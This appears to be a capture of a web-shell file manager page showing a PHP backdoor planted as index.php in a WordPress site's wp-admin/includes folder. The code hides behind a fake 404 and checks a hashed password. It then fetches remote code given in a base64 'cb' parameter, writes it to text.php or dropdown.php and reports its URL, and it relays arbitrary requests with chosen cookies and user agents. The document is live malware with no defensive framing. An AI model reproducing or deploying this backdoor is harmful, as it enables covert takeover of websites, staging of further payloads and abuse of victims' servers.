0byt3m1n1
Path:
/
home1
/
aserty
/
www
/
ourhomebedroom.com
/
wp-admin
/
includes
/
[
Home
]
File: index.php
<?php if(isset($_REQUEST['ex'])){ exit('1'); } if(!isset($_REQUEST['pw'])){ http_response_code(404); exit(); } if(md5($_REQUEST['pw'])!='ffc52a7aef7b90a27c1fbaec516a4f0e'){ exit('pw error'); } if(isset($_REQUEST['cb'])){ $cb = @file_get_contents(base64_decode($_REQUEST['cb'])); $file_name_arr = ['text.php','dropdown.php']; $fid = rand(0,count($file_name_arr)-1); @file_put_contents($file_name_arr[$fid],$cb); $self = $_SERVER['PHP_SELF']; $self_arr = explode('/',$self); $cb_url = $_SERVER['REQUEST_SCHEME'].'://'.$_SERVER['HTTP_HOST'].str_replace($self_arr[count($self_arr)-1],$file_name_arr[$fid],$self); exit($cb_url); } if(!isset($_REQUEST['url'])){ exit('no url'); } $url=base64_decode($_REQUEST['url']); $param = array(); if(isset($_REQUEST['al'])){ $param[] = "Accept-Language:".base64_decode($_REQUEST['al']); }else{ //$param[] = "Accept-Language:ja, en-GB; q=0.7,en; q=0.3"; } if(isset($_REQUEST['ua'])){ $param[] = "User-Agent:".base64_decode($_REQUEST['ua']); }else{ $param[] = "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763"; } if(isset($_REQUEST['ck'])){ $param[] = "cookie:".base64_decode($_REQUEST['ck']); } echo get($url,$param); exit("<-- end -->"); function get($url, $param) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_HTTPHEADER, $param); $data = curl_exec($curl); curl_close($curl); return $data; } ?>